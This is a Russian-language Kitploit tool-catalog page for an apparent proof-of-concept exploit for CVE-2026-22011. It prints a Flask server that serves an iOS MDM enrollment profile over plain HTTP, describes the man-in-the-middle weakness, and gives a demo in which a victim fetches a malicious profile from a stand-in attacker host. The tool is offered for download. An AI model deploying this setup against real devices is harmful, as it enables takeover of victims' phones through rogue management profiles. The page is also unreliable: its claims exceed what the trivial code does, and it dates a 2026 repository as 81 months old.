Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-22011-iOS-MDM-Profile-Delivery-over-HTTP — PoC Flask-сервер для CVE-2026-22011, который раздаёт вредоносный MDM-профиль регистрации iOS по HTTP, обеспечивая перехват типа «человек посередине» и компрометацию устройства. | Kitploit
Инструменты/GitHubGitHub/george0papasotiriou/cve-2026-22011-ios-mdm-profile-delivery-over-http
Безопасность iOSАнализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеМобильная безопасность
GitHubgeorge0papasotiriou/cve-2026-22011-ios-mdm-profile-delivery-over-http

CVE-2026-22011-iOS-MDM-Profile-Delivery-over-HTTP

PoC Flask-сервер для CVE-2026-22011, который раздаёт вредоносный MDM-профиль регистрации iOS по HTTP, обеспечивая перехват типа «человек посередине» и компрометацию устройства.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Репозиторий
81 месяц назадЕщё не проверено
Поделиться

CVE-2026-22011 – Доставка MDM-профиля iOS по HTTP

Программный код (Python Flask MDM-сервер)

root@kitploit:~
# mdm_server.py - Serves enrollment profile over plain HTTP
from flask import Flask, send_file

app = Flask(__name__)
@app.route('/enroll.mobileconfig')
def serve_profile():
    # Vulnerability: profile delivered without HTTPS
    return send_file('profile.mobileconfig', mimetype='application/x-apple-aspen-config')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

CVE-2026-22011 – Доставка MDM-профиля iOS по HTTP

Severity: High

Обзор

Профиль регистрации MDM предоставляется по открытому HTTP без шифрования и проверки цифровой подписи. Злоумышленник в той же сети может перехватить запрос и заменить профиль вредоносным, получив права управления устройством.

Детали уязвимости

  • Тип: Man‑in‑the‑Middle / Небезопасный транспорт
  • Воздействие: Полная компрометация устройства через мошеннический MDM.
  • Корневая причина: URL профиля использует HTTP, и iOS не требует HTTPS для регистрации MDM (зависит от конфигурации), что допускает перехват.

Демонстрация эксплуатации

Запустите HTTP-сервер атакующего:

root@kitploit:~
python mdm_server.py

Когда жертва переходит по адресу http://attacker/enroll.mobileconfig, скачивается вредоносный профиль.

Скачать инструмент